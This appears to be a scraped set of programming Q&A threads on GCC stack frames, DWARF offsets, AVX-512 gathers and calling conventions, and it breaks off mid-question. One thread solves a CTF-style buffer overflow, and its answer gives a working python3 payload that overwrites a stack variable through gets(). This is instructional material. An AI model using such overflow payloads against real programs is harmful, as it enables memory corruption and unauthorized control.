I'm in the process of writing a compiler purely as a learning experience. I'm currently learning about stack frames by compiling simple C++ code and studying the assembly output produced by GCC 4.9.2 for Windows x86.
My simple C++ code is:
#include <iostream>
using namespace std;
int globalVar;
void testStackStuff(void);
void testPassingOneInt32(int v);
void forceStackFrameCreation(int v);
int main()
{
globalVar = 0;
testStackStuff();
std::cout << globalVar << std::endl;
}
void testStackStuff(void)
{
testPassingOneInt32(666);
}
void testPassingOneInt32(int v)
{
globalVar = globalVar + v;
forceStackFrameCreation(v);
}
void forceStackFrameCreation(int v)
{
globalVar = globalVar + v;
}
OK, when this is compiled with -mpreferred-stack-boundary=4 I was expecting to see a stack aligned to 16 bytes. Technically it is aligned to 16 bytes, but with an extra 16 bytes of unused stack space. The prologue for main as produced by GCC is:
22 .loc 1 12 0
23 .cfi_startproc
24 0000 8D4C2404 lea ecx, [esp+4]
25 .cfi_def_cfa 1, 0
26 0004 83E4F0 and esp, -16
27 0007 FF71FC push DWORD PTR [ecx-4]
28 000a 55 push ebp
29 .cfi_escape 0x10,0x5,0x2,0x75,0
30 000b 89E5 mov ebp, esp
31 000d 51 push ecx
32 .cfi_escape 0xf,0x3,0x75,0x7c,0x6
33 000e 83EC14 sub esp, 20
34 .loc 1 12 0
35 0011 E8000000 call ___main
35 00
36 .loc 1 13 0
37 0016 C7050000 mov DWORD PTR _globalVar, 0
38 .loc 1 15 0
39 0020 E8330000 call __Z14testStackStuffv
line 26 rounds esp down to the nearest 16 byte boundary.
lines 27, 28 and 31 push a total of 12 bytes onto the stack, then
line 33 subtracts another 20 bytes from esp, giving a total of 32 bytes!
Why?
line 39 then calls testStackStuff.
NOTE - this call pushes the return address (4 bytes).
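The rounding done by and esp, -16 (and later and esp, -32) can be sketched in C++. This is an illustration only; the helper name and the addresses in the test are made up:

```cpp
#include <cstdint>

// Sketch of what "and esp, -16" does: clearing the low bits rounds an
// address down to the nearest 16-byte boundary. -16 in two's complement
// is ...11110000, so the AND keeps everything except the low 4 bits.
std::uint32_t align_down(std::uint32_t sp, std::uint32_t alignment) {
    return sp & ~(alignment - 1);   // same effect as: and esp, -alignment
}
```

Because the AND only ever clears bits, esp can only move downward, never up past the boundary.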
Now, let's look at the prologue for testStackStuff, keeping in mind that the stack is now 4 bytes closer to the next 16-byte boundary.
67 0058 55 push ebp
68 .cfi_def_cfa_offset 8
69 .cfi_offset 5, -8
70 0059 89E5 mov ebp, esp
71 .cfi_def_cfa_register 5
72 005b 83EC18 sub esp, 24
73 .loc 1 22 0
74 005e C704249A mov DWORD PTR [esp], 666
line 67 pushes another 4 bytes (now 8 bytes towards the boundary).
line 72 subtracts another 24 bytes (total 32 bytes).
At this point the stack is correctly aligned on a 16-byte boundary. But why the factor of 2?
If I change the compiler flags to -mpreferred-stack-boundary=5 I would expect a stack aligned to 32 bytes, but again gcc seems to produce stack frames aligned to 64 bytes, twice the amount I was expecting.
Prologue for main
23 .cfi_startproc
24 0000 8D4C2404 lea ecx, [esp+4]
25 .cfi_def_cfa 1, 0
26 0004 83E4E0 and esp, -32
27 0007 FF71FC push DWORD PTR [ecx-4]
28 000a 55 push ebp
29 .cfi_escape 0x10,0x5,0x2,0x75,0
30 000b 89E5 mov ebp, esp
31 000d 51 push ecx
32 .cfi_escape 0xf,0x3,0x75,0x7c,0x6
33 000e 83EC34 sub esp, 52
34 .loc 1 12 0
35 0011 E8000000 call ___main
35 00
36 .loc 1 13 0
37 0016 C7050000 mov DWORD PTR _globalVar, 0
37 00000000
37 0000
38 .loc 1 15 0
39 0020 E8330000 call __Z14testStackStuffv
line 26 rounds esp down to the nearest 32 byte boundary
lines 27, 28 and 31 push a total of 12 bytes onto the stack, then
line 33 subtracts another 52 bytes from esp, giving a total of 64 bytes!
and the prologue for testStackStuff is
66 .cfi_startproc
67 0058 55 push ebp
68 .cfi_def_cfa_offset 8
69 .cfi_offset 5, -8
70 0059 89E5 mov ebp, esp
71 .cfi_def_cfa_register 5
72 005b 83EC38 sub esp, 56
73 .loc 1 22 0
(4 bytes on stack from) call __Z14testStackStuffv
(4 bytes on stack from) push ebp
(56 bytes on stack from) sub esp,56
total 64 bytes.
Does anybody know why gcc is creating this extra stack space or have I overlooked something obvious?
Thanks for any help you can offer.
In order to resolve this mystery, you will need to look at the documentation of gcc to find out exactly which flavor of Application Binary Interface (ABI) it uses, and then go find the specification of that ABI and read it. If you are "in the process of writing a compiler purely as a learning experience" you will definitely need it.
In short, and in broad terms, what is happening is that the ABI mandates that this extra space be reserved by the current function, for the purpose of passing parameters to functions invoked by the current function. The decision of how much space to reserve depends primarily on the amount of parameter passing that the function intends to do, but it is a bit more nuanced than that, and the ABI is the document that explains it in detail.
In the old style of stack frames, we would PUSH parameters onto the stack and then invoke a function.
In the new style of stack frames, parameters are placed on the stack at specific offsets relative to ESP, and then the function is invoked. (EBP is largely unnecessary in this scheme, though here it is still preserved and copied from ESP.) This is evidenced by the fact that mov DWORD PTR [esp], 666 is used to pass the 666 argument for the call testPassingOneInt32(666);.
For why it's doing the push DWORD PTR [ecx-4] to copy the return address, see this partial duplicate. IIRC, it's constructing a complete copy of the return-address / saved-ebp pair.
but again gcc seems to produce stack frames aligned to 64 bytes
No, it used and esp, -32. The stack frame size looks like 64 bytes, but its alignment is only 32B.
I'm not sure why it leaves so much extra space in the stack frame. It's not very interesting to guess why gcc -O0 does what it does, because it's not even trying to be optimal.
You obviously compiled without optimization, which makes the whole thing less interesting. This tells you more about gcc internals and what was convenient for gcc, not that the code it emitted was necessary or does anything useful. Also, use http://gcc.godbolt.org/ to get nice asm output without the CFI directives and other noise. (Please tidy up the asm code blocks in your question with output from that. All the noise makes them harder to read.)
Related
This is an extract from a binary that is vulnerable to a buffer overflow. I decompiled it with Ghidra.
char local_7 [32];
long local_78;
printf("Give it a try");
gets(local_7);
if (local_78 != 0x4141414141414141) {
if (local_78 == 0x1122334455667788) {
puts("That's won");
}
puts("Let's continue");
}
I'd like to understand why a buffer overflow is possible here.
I checked the "0x4141414141414141" hex value and saw it corresponds to the string "AAAAAAAA". But what exactly do the conditions on "0x4141414141414141" and "0x1122334455667788" do? And to be more precise, what could the user enter to get the "That's won" message?
Any explanations would be greatly appreciated, thanks!
___EDIT___
I have to add that I see these two hex values when using the "disas main" command:
0x00000000000011a7 <+8>: movabs $0x4141414141414141,%rax
0x00000000000011e6 <+71>: movabs $0x4141414141414141,%rax
0x00000000000011f6 <+87>: movabs $0x1122334455667788,%rax
I tried a buffer overflow using python3 -c "print ('A' * 32 +'\x88\x77\x66\x55\x44\x33\x22\x11')" | ./myBinary.
But I always get the "Let's continue" message. I'm not far from the solution, but I guess I'm missing something. Could you help me?
___EDIT 2___
Before the gets :
char local_7 [40];
long local_78;
local_78 = 0x4141414141414141;
printf("Give it a try");
fflush(stdout);
gets(local_7);
[... and so on]
Here is the full disassembly:
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000001189 <+0>: endbr64
0x000000000000118d <+4>: push %rbp
0x000000000000118e <+5>: mov %rsp,%rbp
0x0000000000001191 <+8>: sub $0x30,%rsp
0x0000000000001195 <+12>: lea 0xe68(%rip),%rdi # 0x2004
0x000000000000119c <+19>: mov $0x0,%eax
0x00000000000011a1 <+24>: callq 0x1080 <printf#plt>
0x00000000000011a6 <+29>: lea -0x30(%rbp),%rax
0x00000000000011aa <+33>: mov %rax,%rdi
0x00000000000011ad <+36>: mov $0x0,%eax
0x00000000000011b2 <+41>: callq 0x1090 <gets#plt>
0x00000000000011b7 <+46>: movabs $0x4141414141414141,%rax
0x00000000000011c1 <+56>: cmp %rax,-0x8(%rbp)
0x00000000000011c5 <+60>: je 0x11ef <main+102>
0x00000000000011c7 <+62>: movabs $0x1122334455667788,%rax
0x00000000000011d1 <+72>: cmp %rax,-0x8(%rbp)
0x00000000000011d5 <+76>: jne 0x11e3 <main+90>
0x00000000000011d7 <+78>: lea 0xe34(%rip),%rdi # 0x2012
0x00000000000011de <+85>: callq 0x1070 <puts#plt>
0x00000000000011e3 <+90>: lea 0xe33(%rip),%rdi # 0x201d
0x00000000000011ea <+97>: callq 0x1070 <puts#plt>
0x00000000000011ef <+102>: mov $0x0,%eax
0x00000000000011f4 <+107>: leaveq
0x00000000000011f5 <+108>: retq
The important addresses can be determined from the instruction that sets up the gets parameter (local_7):
0x00000000000011a6 <+29>: lea -0x30(%rbp),%rax
and the cmp instruction comparing the local_78 variable.
0x00000000000011c1 <+56>: cmp %rax,-0x8(%rbp)
As you can see the local_7 is at -0x30(%rbp), and local_78 is at -0x8(%rbp), exactly 40 bytes after the buffer.
Your python command is not correct since you are using string operations, which cause it to produce valid UTF-8 and therefore extra bytes:
$ python3 -c "print ('A' * 40 +'\x88\x77\x66\x55\x44\x33\x22\x11')"|hd -v
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000020 41 41 41 41 41 41 41 41 c2 88 77 66 55 44 33 22 |AAAAAAAA..wfUD3"|
00000030 11 0a |..|
00000032
Notice the c2 byte before 88. See the following question for details:
Why is the output of print in python2 and python3 different with the same string?
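To see where that c2 byte comes from: Python 3's print works on text, so '\x88' is the code point U+0088, and encoding it as UTF-8 yields the two bytes 0xC2 0x88. A toy sketch of the UTF-8 encoding rule for code points below 0x800 (illustration only, not Python's actual implementation):

```cpp
#include <string>

// Toy UTF-8 encoder for code points below 0x800, enough to show why
// U+0088 becomes the two bytes 0xC2 0x88 while 'A' (U+0041) stays one byte.
std::string utf8_encode(unsigned cp) {
    std::string out;
    if (cp < 0x80) {                                   // ASCII: 1 byte
        out.push_back(static_cast<char>(cp));
    } else if (cp < 0x800) {                           // 2-byte sequence
        out.push_back(static_cast<char>(0xC0 | (cp >> 6)));
        out.push_back(static_cast<char>(0x80 | (cp & 0x3F)));
    }
    return out;
}
```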
If we instead use bytes types, we can get the correct output:
$ python3 -c "import sys; sys.stdout.buffer.write(b'A' * 40 + b'\x88\x77\x66\x55\x44\x33\x22\x11')"|hd -v
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000020 41 41 41 41 41 41 41 41 88 77 66 55 44 33 22 11 |AAAAAAAA.wfUD3".|
00000030
Using this input, we get the "That's won" message:
$ python3 -c "import sys; sys.stdout.buffer.write(b'A' * 40 + b'\x88\x77\x66\x55\x44\x33\x22\x11')"|./a.out
Give it a tryThat's won
Let's continue
This binary is vulnerable to a buffer overflow because it uses the gets() function, which is inherently unsafe and was deprecated for that reason.
It copies the user input into the passed buffer without checking the buffer's size. So, if the user's input is larger than the available space, it overflows in memory and can overwrite other variables or structures that are located after the buffer.
That is the case of the long local_78; variable, which is in the stack after the buffer, so we can potentially overwrite its value.
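The mechanics can be sketched with a hypothetical stand-in for the stack layout; the names and sizes mirror the decompiled code, and the memcpy plays the role of gets()'s unchecked copy:

```cpp
#include <cstdint>
#include <cstring>

// Hypothetical stand-in for the function's frame: a 40-byte buffer
// with an 8-byte variable right after it, as in the binary.
struct Frame {
    char buf[40];            // local_7
    std::uint64_t check;     // local_78
};

// An unchecked copy (what gets() effectively does): input longer than
// buf spills into check and overwrites it.
std::uint64_t simulate_overflow(const char *input, std::size_t len) {
    Frame f{};
    f.check = 0x4141414141414141ULL;
    std::memcpy(&f, input, len);   // no bounds check on buf
    return f.check;
}
```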
To do so, we need to pass an input that is:
minimum 32 bytes, to fill the actual buffer (a char (ASCII character) is usually 1 byte)
plus an additional, variable number of bytes to fill the space between the buffer and the long variable (compilers often reorder locals or insert padding, and may place other variables between those two even if we didn't declare them there; the stack layout is not always 100% predictable)
plus 8 bytes, which is the size of a long on most 64-bit architectures (it could differ, but let's assume x86-64). This is the value we will overwrite the variable with.
We don't care about what we put in the first 32+X bytes (except for the null byte). The program then checks local_78 for a special value, and if that check passes, it executes puts ("That's won");, meaning you have "won", i.e. successfully exploited the program and overwritten the memory.
The catch is that this value is 0x1122334455667788 (again a long, which is 8 bytes). We can read it by separating its bytes: 0x11 0x22 0x33 0x44 0x55 0x66 0x77 0x88, and seeing which byte corresponds to which ASCII character.
The issue is that bytes like 0x11 are not printable ASCII characters, so you cannot type them directly into the console: a normal keyboard has no key that inputs the character 0x11, because it has no visual representation. You will need an additional program to exploit the binary, one that uses whatever mechanisms the operating system provides to pass such values. On Linux, for example, this can be done using pipes / output redirection.
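Since those bytes can't be typed, the payload has to be generated programmatically. A sketch in C++ of building the same payload as the python3 one-liner (the 40-byte padding matches the offset found from the disassembly; x86-64 is little-endian, so the least significant byte 0x88 comes first in memory):

```cpp
#include <cstdint>
#include <string>

// Build the exploit payload: 40 filler bytes to reach local_78, then
// the 8 target bytes in little-endian order.
std::string build_payload() {
    std::string p(40, 'A');
    std::uint64_t target = 0x1122334455667788ULL;
    for (int i = 0; i < 8; ++i)                    // least significant first
        p.push_back(static_cast<char>((target >> (8 * i)) & 0xFF));
    return p;
}
```

Writing this string to stdout and piping it into the binary has the same effect as the sys.stdout.buffer.write approach.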
I am playing around with CPython and trying to understand how a debugger works.
Specifically, I am trying to get the location of the last PyFrameObject so that I can traverse that and get the Python backtrace.
In the file ceval.c, line 689 has the definition of the function:
PyObject * PyEval_EvalFrameEx(PyFrameObject *f, int throwflag)
What I am interested in getting is the location of f on the stack. When dumping the binary with dwarfdump I get that f is at $rbp-824, but if I dump the binary with objdump I get that the location is $rbp-808 - a discrepancy of 16. Also, when debugging with GDB, I get that the correct answer is $rbp-808 like objdump gives me. Why the discrepancy, and why is dwarfdump incorrect? What am I not understanding?
How to technically recreate the problem:
Download python-2.7.17.tgz from Python website. Extract.
I compiled python-2.7.17 from source with debug symbols (./configure --enable-pydebug && make). Run the following commands on the resulting python binary:
dwarfdump Python-2.7.17/python has the following output:
DW_AT_name f
DW_AT_decl_file 0x00000001 /home/meir/code/python/Python-2.7.17/Python/ceval.c
DW_AT_decl_line 0x000002b1
DW_AT_type <0x00002916>
DW_AT_location len 0x0003: 91c879: DW_OP_fbreg -824
I know this is the correct f because the line the variable is declared on is 689 (0x2b1). As you can see the location is:
DW_AT_location len 0x0003: 91c879: DW_OP_fbreg -824: Meaning $rbp-824.
Running the command objdump -S Python-2.7.17/python has the following output:
PyEval_EvalFrameEx(PyFrameObject *f, int throwflag)
{
f7577: 55 push %rbp
f7578: 48 89 e5 mov %rsp,%rbp
f757b: 41 57 push %r15
f757d: 41 56 push %r14
f757f: 41 55 push %r13
f7581: 41 54 push %r12
f7583: 53 push %rbx
f7584: 48 81 ec 38 03 00 00 sub $0x338,%rsp
f758b: 48 89 bd d8 fc ff ff mov %rdi,-0x328(%rbp)
f7592: 89 b5 d4 fc ff ff mov %esi,-0x32c(%rbp)
f7598: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax
f759f: 00 00
f75a1: 48 89 45 c8 mov %rax,-0x38(%rbp)
f75a5: 31 c0 xor %eax,%eax
Debugging this output will show you that the relevant line is:
f758b: 48 89 bd d8 fc ff ff mov %rdi,-0x328(%rbp) where you can clearly see that f is being loaded from -0x328(%rbp) which is $rbp-808. Also, GDB supports this finding.
So again, the question is: what am I missing, and why the 16-byte discrepancy between dwarfdump and reality?
Thanks
Edit:
The dwarfdump output including the function above is:
< 1><0x00004519> DW_TAG_subprogram
DW_AT_external yes(1)
DW_AT_name PyEval_EvalFrameEx
DW_AT_decl_file 0x00000001 /home/meir/code/python/Python-2.7.17/Python/ceval.c
DW_AT_decl_line 0x000002b1
DW_AT_prototyped yes(1)
DW_AT_type <0x00000817>
DW_AT_low_pc 0x000f7577
DW_AT_high_pc <offset-from-lowpc>53969
DW_AT_frame_base len 0x0001: 9c: DW_OP_call_frame_cfa
DW_AT_GNU_all_tail_call_sites yes(1)
DW_AT_sibling <0x00005bbe>
< 2><0x0000453b> DW_TAG_formal_parameter
DW_AT_name f
DW_AT_decl_file 0x00000001 /home/meir/code/python/Python-2.7.17/Python/ceval.c
DW_AT_decl_line 0x000002b1
DW_AT_type <0x00002916>
DW_AT_location len 0x0003: 91c879: DW_OP_fbreg -824
According to the answer below, DW_OP_fbreg is an offset from the frame base - in my case DW_OP_call_frame_cfa. I am having trouble identifying the frame base. My registers are as follows:
(gdb) info registers
rax 0xfffffffffffffdfe -514
rbx 0x7f6a4887d040 140094460121152
rcx 0x7f6a48e83ff7 140094466441207
rdx 0x0 0
rsi 0x0 0
rdi 0x0 0
rbp 0x7ffd24bcef00 0x7ffd24bcef00
rsp 0x7ffd24bceba0 0x7ffd24bceba0
r8 0x7ffd24bcea50 140725219813968
r9 0x0 0
r10 0x0 0
r11 0x246 582
r12 0x7f6a48870df0 140094460071408
r13 0x7f6a48874b58 140094460087128
r14 0x1 1
r15 0x7f6a48873794 140094460082068
rip 0x5559834e99c0 0x5559834e99c0 <PyEval_EvalFrameEx+46153>
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
As stated above, I already know that %rbp-808 works. What is the correct way to do it with the registers that I have?
Edit:
I finally understood the answer. I needed to unwind one more frame and find the place where my function was called. There, the frame base really was $rsp, and $rsp-824 was correct.
DW_OP_fbreg -824: Meaning $rbp-824
It does not mean that. It means, offset -824 from frame base (virtual) register, which is not necessarily (nor usually) equal to $rbp.
You need to look for DW_AT_frame_base to know what the frame base in the current function is.
Most likely it's defined as DW_OP_call_frame_cfa, which is the value of $RSP just before the current function was called, and here is equal to $RBP+16 (8 bytes for the return address saved by the CALL instruction, and 8 bytes for the previous $RBP saved by the first instruction of your function). That accounts for the 16-byte difference: DW_OP_fbreg -824 means CFA-824 = ($RBP+16)-824 = $RBP-808, exactly what GDB reports.
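That arithmetic can be sketched directly (assuming the standard push %rbp / mov %rsp,%rbp prologue; the helper name is made up for illustration):

```cpp
// Translate a DW_OP_fbreg offset (relative to the CFA) into an
// RBP-relative offset, assuming the standard x86-64 prologue:
// CALL pushes 8 bytes (return address), push %rbp saves 8 more,
// so after mov %rsp,%rbp we have CFA = RBP + 16.
long fbreg_to_rbp_offset(long fbreg_offset) {
    const long cfa_minus_rbp = 16;   // return address + saved RBP
    return fbreg_offset + cfa_minus_rbp;
}
```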
I've recently been introduced to Vector Instructions (theoretically) and am excited about how I can use them to speed up my applications.
One area I'd like to improve is a very hot loop:
__declspec(noinline) int pleaseVectorize(int* arr, int* someGlobalArray, int* output)
{
for (int i = 0; i < 16; ++i)
{
auto someIndex = arr[i];
output[i] = someGlobalArray[someIndex];
}
for (int i = 0; i < 16; ++i)
{
if (output[i] == 1)
{
return i;
}
}
return -1;
}
But of course, all 3 major compilers (msvc, gcc, clang) refuse to vectorize this. I can sort of understand why, but I wanted to get a confirmation.
If I had to vectorize this by hand, it would be:
(1) VectorLoad "arr", this brings in 16 4-byte integers let's say into zmm0
(2) 16 memory loads from the address pointed to by zmm0[0..3] into zmm1[0..3], load from address pointed into by zmm0[4..7] into zmm1[4..7] so on and so forth
(3) compare zmm0 and zmm1
(4) vector popcnt into the output to find out the most significant bit and basically divide that by 8 to get the index that matched
First of all, can vector instructions do these things? Like can they do this "gathering" operation, i.e. do a load from address pointing to zmm0?
Here is what clang generates:
0000000000400530 <_Z5superPiS_S_>:
400530: 48 63 07 movslq (%rdi),%rax
400533: 8b 04 86 mov (%rsi,%rax,4),%eax
400536: 89 02 mov %eax,(%rdx)
400538: 48 63 47 04 movslq 0x4(%rdi),%rax
40053c: 8b 04 86 mov (%rsi,%rax,4),%eax
40053f: 89 42 04 mov %eax,0x4(%rdx)
400542: 48 63 47 08 movslq 0x8(%rdi),%rax
400546: 8b 04 86 mov (%rsi,%rax,4),%eax
400549: 89 42 08 mov %eax,0x8(%rdx)
40054c: 48 63 47 0c movslq 0xc(%rdi),%rax
400550: 8b 04 86 mov (%rsi,%rax,4),%eax
400553: 89 42 0c mov %eax,0xc(%rdx)
400556: 48 63 47 10 movslq 0x10(%rdi),%rax
40055a: 8b 04 86 mov (%rsi,%rax,4),%eax
40055d: 89 42 10 mov %eax,0x10(%rdx)
400560: 48 63 47 14 movslq 0x14(%rdi),%rax
400564: 8b 04 86 mov (%rsi,%rax,4),%eax
400567: 89 42 14 mov %eax,0x14(%rdx)
40056a: 48 63 47 18 movslq 0x18(%rdi),%rax
40056e: 8b 04 86 mov (%rsi,%rax,4),%eax
400571: 89 42 18 mov %eax,0x18(%rdx)
400574: 48 63 47 1c movslq 0x1c(%rdi),%rax
400578: 8b 04 86 mov (%rsi,%rax,4),%eax
40057b: 89 42 1c mov %eax,0x1c(%rdx)
40057e: 48 63 47 20 movslq 0x20(%rdi),%rax
400582: 8b 04 86 mov (%rsi,%rax,4),%eax
400585: 89 42 20 mov %eax,0x20(%rdx)
400588: 48 63 47 24 movslq 0x24(%rdi),%rax
40058c: 8b 04 86 mov (%rsi,%rax,4),%eax
40058f: 89 42 24 mov %eax,0x24(%rdx)
400592: 48 63 47 28 movslq 0x28(%rdi),%rax
400596: 8b 04 86 mov (%rsi,%rax,4),%eax
400599: 89 42 28 mov %eax,0x28(%rdx)
40059c: 48 63 47 2c movslq 0x2c(%rdi),%rax
4005a0: 8b 04 86 mov (%rsi,%rax,4),%eax
4005a3: 89 42 2c mov %eax,0x2c(%rdx)
4005a6: 48 63 47 30 movslq 0x30(%rdi),%rax
4005aa: 8b 04 86 mov (%rsi,%rax,4),%eax
4005ad: 89 42 30 mov %eax,0x30(%rdx)
4005b0: 48 63 47 34 movslq 0x34(%rdi),%rax
4005b4: 8b 04 86 mov (%rsi,%rax,4),%eax
4005b7: 89 42 34 mov %eax,0x34(%rdx)
4005ba: 48 63 47 38 movslq 0x38(%rdi),%rax
4005be: 8b 04 86 mov (%rsi,%rax,4),%eax
4005c1: 89 42 38 mov %eax,0x38(%rdx)
4005c4: 48 63 47 3c movslq 0x3c(%rdi),%rax
4005c8: 8b 04 86 mov (%rsi,%rax,4),%eax
4005cb: 89 42 3c mov %eax,0x3c(%rdx)
4005ce: c3 retq
4005cf: 90 nop
Your idea of how it could work is close, except that you want a bit-scan / find-first-set-bit (x86 BSF or TZCNT) of the compare bitmap, not population-count (number of bits set).
AVX2 / AVX512 have vpgatherdd which does use a vector of signed 32-bit scaled indices. It's barely worth using on Haswell, improved on Broadwell, and very good on Skylake. (http://agner.org/optimize/, and see other links in the x86 tag wiki, such as Intel's optimization manual which has a section on gather performance). The SIMD compare and bitscan are very cheap by comparison; single uop and fully pipelined.
gcc8.1 can auto-vectorize your gather, if it can prove that your inputs don't overlap your output function arg. Sometimes possible after inlining, but for the non-inline version, you can promise this with int * __restrict output. Or if you make output a local temporary instead of a function arg. (General rule: storing through a non-_restrict pointer will often inhibit auto-vectorization, especially if it's a char* that can alias anything.)
gcc and clang never vectorize search loops; only loops where the trip-count can be calculated before entering the loop. But ICC can; it does a scalar gather and stores the result (even if output[] is a local so it doesn't have to do that as a side-effect of running the function), then uses SIMD packed-compare + bit-scan.
Compiler output for a __restrict version. Notice that gcc8.1 and ICC avoid 512-bit vectors by default when tuning for Skylake-AVX512. 512-bit vectors can limit the max-turbo, and always shut down the vector ALU on port 1 while they're in the pipeline, so it can make sense to use AVX512 or AVX2 with 256-bit vectors in case this function is only a small part of a big program. (Compilers don't know that this function is super-hot in your program.)
If output[] is a local, a better code-gen strategy would probably be to compare while gathering, so an early hit skips the rest of the loads. The compilers that go fully scalar (clang and MSVC) both miss this optimization. In fact, they even store to the local array even though clang mostly doesn't re-read it (keeping results in registers). Writing the source with the compare inside the first loop would work to get better scalar code. (Depending on cache misses from the gather vs. branch mispredicts from non-SIMD searching, scalar could be a good strategy. Especially if hits in the first few elements are common. Current gather hardware can't take advantage of multiple elements coming from the same cache line, so the hard limit is still 2 elements loaded per clock cycle.
But using a wide vector load for the indices to feed a gather reduces load-port / cache access pressure significantly if your data was mostly hot in cache.)
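A sketch of that source-level change for the scalar case, keeping the question's parameter names (the output[] stores are kept so the results are still recorded up to the hit):

```cpp
// Fusing the compare into the gather loop: an early hit returns
// immediately and skips the remaining loads.
int find_first_one(const int *arr, const int *someGlobalArray, int *output)
{
    for (int i = 0; i < 16; ++i) {
        int v = someGlobalArray[arr[i]];
        output[i] = v;
        if (v == 1)
            return i;        // early out: the rest of the loads are skipped
    }
    return -1;               // not found
}
```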
A compiler could have auto-vectorized the __restrict version of your code to something like this. (gcc manages the gather part, ICC manages the SIMD compare part)
;; Windows x64 calling convention: rcx,rdx, r8,r9
; but of course you'd actually inline this
; only uses ZMM16..31, so vzeroupper not required
vmovdqu32 zmm16, [rcx/arr] ; You def. want to reach an alignment boundary if you can for ZMM loads, vmovdqa32 will enforce that
kxnorw k1, k0,k0 ; k1 = -1. k0 false dep is likely not a problem.
; optional: vpxord xmm17, xmm17, xmm17 ; break merge-masking false dep
vpgatherdd zmm17{k1}, [rdx + zmm16 * 4] ; GlobalArray + scaled-vector-index
; sets k1 = 0 when done
vmovdqu32 [r8/output], zmm17
vpcmpd k1, zmm17, zmm31, 0 ; 0->EQ. Outside the loop, do zmm31=set1_epi32(1)
; k1 = compare bitmap
kortestw k1, k1
jz .not_found ; early check for not-found
kmovw edx, k1
; tzcnt doesn't have a false dep on the output on Skylake
; so no AVX512 CPUs need to worry about that HSW/BDW issue
tzcnt eax, edx ; bit-scan for the first (lowest-address) set element
; input=0 produces output=32
; or avoid the branch and let 32 be the not-found return value.
; or do a branchless kortestw / cmov if -1 is directly useful without branching
ret
.not_found:
mov eax, -1
ret
You can do this yourself with intrinsics:
Intel's instruction-set reference manual (HTML extract at http://felixcloutier.com/x86/index.html) includes C/C++ intrinsic names for each instruction, or search for them in https://software.intel.com/sites/landingpage/IntrinsicsGuide/
I changed the output type to __m512i. You could change it back to an array if you aren't manually vectorizing the caller. You definitely want this function to inline.
#include <immintrin.h>
//__declspec(noinline) // I *hope* this was just to see the stand-alone asm version
// but it means the output array can't optimize away at all
//static inline
int find_first_1(const int *__restrict arr, const int *__restrict someGlobalArray, __m512i *__restrict output)
{
__m512i vindex = _mm512_load_si512(arr);
__m512i gather = _mm512_i32gather_epi32(vindex, someGlobalArray, 4); // indexing by 4-byte int
*output = gather;
__mmask16 cmp = _mm512_cmpeq_epi32_mask(gather, _mm512_set1_epi32(1));
// Intrinsics make masks freely convert to integer
// even though it costs a `kmov` instruction either way.
int onepos = _tzcnt_u32(cmp);
if (onepos >= 16){
return -1;
}
return onepos;
}
All 4 x86 compilers produce similar asm to what I suggested (see it on the Godbolt compiler explorer), but of course they have to actually materialize the set1_epi32(1) vector constant, or use a (broadcast) memory operand. Clang actually uses a {1to16} broadcast-load from a constant for the compare: vpcmpeqd k0, zmm1, dword ptr [rip + .LCPI0_0]{1to16}. (Of course they will make different choices when inlined into a loop.) Others use mov eax,1 / vpbroadcastd zmm0, eax.
gcc8.1 -O3 -march=skylake-avx512 has two redundant mov eax, -1 instructions: one to feed a kmov for the gather, the other for the return-value stuff. Silly compiler should keep it around and use a different register for the 1.
All of them use zmm0..15 and thus can't avoid a vzeroupper. (xmm16..31 are not accessible with legacy-SSE, so the SSE/AVX transition penalty problem that vzeroupper solves doesn't exist if the only wide vector registers you use are y/zmm16..31). There may still be tiny possible advantages to vzeroupper, like cheaper context switches when the upper halves of ymm or zmm regs are known to be zero (Is it useful to use VZEROUPPER if your program+libraries contain no SSE instructions?). If you're going to use it anyway, no reason to avoid xmm0..15.
Oh, and in the Windows calling convention, xmm6..15 are call-preserved. (Not ymm/zmm, just the low 128 bits), so zmm16..31 are a good choice if you run out of xmm0..5 regs.
I'm currently reading a very informative and good-to-follow book about C-Security and currently there is a chapter about Assembly.
Considering the following C-Code:
1 void funktion (int a, int b, int c)
2 {
3 int buff1[5];
4 char buff2[10];
5 buff1[0] = '6';
6 buff2[0] = 'A';
7 buff2[1] = 'B';
8 }
9
10 int main (void)
11 {
12 int i = 1;
13 funktion (1, 2, 3);
14 return 0;
15 }
When I debug the executable in gdb and disassemble main, I get the following output:
# -----------FUNC_PROLOG----------
24 0x00000000004004d4 <+0>: push %rbp
28 0x00000000004004d5 <+1>: mov %rsp,%rbp
33 0x00000000004004d8 <+4>: sub $0x10,%rsp
34
#----------FUNC_OPERATIONS----------
39 0x00000000004004dc <+8>: movl $0x1,-0x4(%rbp)
43 0x00000000004004e3 <+15>: mov $0x3,%edx
44 0x00000000004004e8 <+20>: mov $0x2,%esi
45 0x00000000004004ed <+25>: mov $0x1,%edi
The book I'm reading is from 2003, so I know my compilation won't look exactly like the one in the book. I interpret this instruction (line 33) as the enlargement of the current stack frame. In the book, the stack pointer is decremented (= the stack frame enlarged) by 4 bytes, whereas here it is decremented by 16 bytes. I think this is an optimization: the size of the local variables (int i = 4 bytes) plus the size of the parameters (int a, int b, int c = 12 bytes) = 16 bytes is allocated on the stack in one step, instead of pushing onto the stack each time, which is less efficient. However, this could be a misinterpretation on my part, which is relevant to my real question:
In lines 43-45 the parameters are stored in reverse order, but they are stored in registers, not on the stack, as you can see there.
So why is memory allocated for the parameters on the stack, even though they are not stored on the stack?
Btw-Questions:
At line 28 you can see a mov instruction without a size suffix. Why? I thought AT&T syntax required one.
Is it possible to configure gdb so that I see values in decimal instead of hexadecimal?
In the C++11 standard there is a note regarding the array backing the uniform initialisation that states:
The implementation is free to allocate the array in read-only memory if an explicit array with the same initializer could be so allocated.
Does GCC/Clang/VS take advantage of this? Or is every initialisation using this feature subject to additional data on the stack, and additional initialisation time for this hidden array?
For instance, given the following example:
void function()
{
std::vector<std::string> values = { "First", "Second" };
...
